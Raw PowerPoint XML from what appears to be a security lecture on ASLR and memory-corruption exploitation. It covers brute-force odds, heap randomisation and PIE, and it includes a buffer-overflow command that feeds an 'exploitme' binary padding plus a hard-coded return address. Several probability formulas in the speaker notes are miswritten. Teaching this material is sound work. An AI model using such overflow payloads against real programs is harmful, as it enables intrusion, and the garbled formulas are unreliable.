        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1972193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n*2^16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is the probability of succeeding by n trials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sum of 1 to n is n(n+1)/2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2^16*(2^16+1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> / (2 * 2^16) =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>2^16 + 1 / 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243172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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334642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Fail n-1 times and success on nth trial:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that probability of failure is (2^16 – 1) / 2^16, or 1 – 2^16.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So, (1-2^16)^n-1 * 1/(2^16)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73733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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14118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 a modern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> system so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (heap) is randomized too</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>address           perms offset  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   pathname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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1359757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167CAFC-2AA3-A84D-A759-81865A8610EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273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information disclosure is huge. On Windows an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> information disclosure with a buffer overflow = game over, while with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t> maybe not.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CC45A8A3-9FBB-431D-AAA8-BEEA360F5701}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82937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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>bss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>recorded in object file, but not in binary itself</a:t>
            </a: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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413956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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313692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baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PICode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t> =&gt; goes through Global Offset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smtClean="0"/>
              <a:t>PIExecutable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is weaker, must be executable, not shared library</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CC45A8A3-9FBB-431D-AAA8-BEEA360F5701}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235406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process is randomized once, e.g. web server</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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59905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276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476A7A-44CF-5A4C-ABB8-AC81BEB24053}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1580300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ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>exploitme</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perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> -e 'print "a"x12 . "\x04\x85\x04\x08"')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296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93F16D-7DC7-0D43-A9CA-09F00DCDDCC9}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27160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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag50.xml"/><Relationship Id="rId2"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slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag56.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5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Master" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag61.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6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slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag71.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7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8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag79.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag80.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag76.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag77.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83.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag84.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag85.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag81.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8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slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag86.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8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slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag91.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9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tags" Target="../tags/tag97.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag98.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag99.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag100.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag101.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag94.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.xml"/><Relationship Id="rId2"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04.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag105.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag102.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10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08.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag106.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10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tags" Target="../tags/tag113.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag114.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag109.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11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17.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag118.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag119.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag120.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag115.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11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tags" Target="../tags/tag125.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag121.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12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28.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag129.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag130.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag126.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12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Master" Target="../slideMasters/slideMaster1.xml"/><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Master" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21.xml"/><Relationship Id="rId2"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Master" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26.xml"/><Relationship Id="rId2"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slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29.xml"/><Relationship Id="rId2"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Master" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag37.xml"/><Relationship Id="rId2"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Master" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag41.xml"/><Relationship Id="rId2"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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag44.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4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E86D5785-7D68-8640-9C7E-4CB4415E4AAF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/6/17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A0AB15E-FFE3-4B47-B9E2-DD4B5E55497A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/6/17</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81FD670A-49D5-6B44-876E-D2BDD5B5BF5A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/6/17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653081F9-3F3A-B044-B1B3-3E71C9E162B6}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/6/17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7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="512830"/>
            <a:ext cx="9161762" cy="634517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694548"/>
            <a:ext cx="7848600" cy="1927225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4800" cap="none" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3721466"/>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0"/>
            <a:ext cx="9161763" cy="785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29106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E86D5785-7D68-8640-9C7E-4CB4415E4AAF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/6/17</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25995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70FB8C43-0D6C-3C4D-8072-45F708119B8E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/6/17</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998145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0"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9272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37AABCFA-591C-9145-B44A-9EFDDC32D4B1}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/6/17</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18546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D01F7D1C-C9EC-E743-9063-B0846E758DFA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/6/17</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958222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40582EA0-B875-B64A-B17C-15E030E9CF15}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/6/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}"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7117056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74391607-EAAA-2946-9E02-E1C11496083C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/6/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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17834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70FB8C43-0D6C-3C4D-8072-45F708119B8E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/6/17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54391509-7D79-C647-92BF-4A0564F0C41A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/6/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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42685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FBD64FD0-82A6-144B-A86D-7BBA3EAF78C2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/6/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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01557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2B93CA3-029B-EF42-8B8C-890C6E340BE0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/6/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
